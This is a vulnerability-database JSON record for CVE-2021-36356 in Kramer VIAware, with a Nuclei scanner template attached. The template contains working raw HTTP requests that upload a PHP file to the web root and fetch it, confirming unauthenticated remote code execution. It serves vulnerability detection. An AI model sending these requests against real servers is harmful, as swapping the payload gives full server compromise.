{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2021-36356/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2021-36356/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2021-36356/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2021-36356/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2021-36356/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2021-36356"},"sightings":{"href":"/api/v1/sightings/cve-2021-36356"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2021/CVE-2021-36356.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2021-36356\n\ninfo:\n  name: Kramer VIAware - Remote Code Execution\n  author: gy741\n  severity: critical\n  description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.\n  impact: |\n    Unauthenticated attackers can upload arbitrary PHP files to the web root, achieving remote code execution and complete server compromise.\n  remediation: |\n    Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface.\n  reference:\n    - https://www.exploit-db.com/exploits/50856\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-36356\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-35064\n    - https://write-up.github.io/kramerav/\n    - https://github.com/ARPSyndicate/cvemon\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-36356\n    cwe-id: CWE-434\n    epss-score: 0.54393\n    epss-percentile: 0.98976\n    cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: kramerav\n    product: viaware\n  tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav,vkev,vuln\nvariables:\n  useragent: \"{{rand_base(6)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        radioBtnVal=%3C%3Fphp+echo+md5%28%22CVE-2021-35064%22%29%3B+%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php\n\n      - |\n        GET /{{randstr}}.php' HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        part: body_2\n        words:\n          - \"44f63b292601ec4ab0d8c3244c9f5ebe\"\n# digest: 4a0a00473045022100bfa997654d9ab2c3c1ccbe72209b19c6696fabcd5372f838a57fb8e5997c0198022054948df94951d18663960dee5ee87f57277d074562c1d8ea2d97406d83015ca1:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2021-36356"}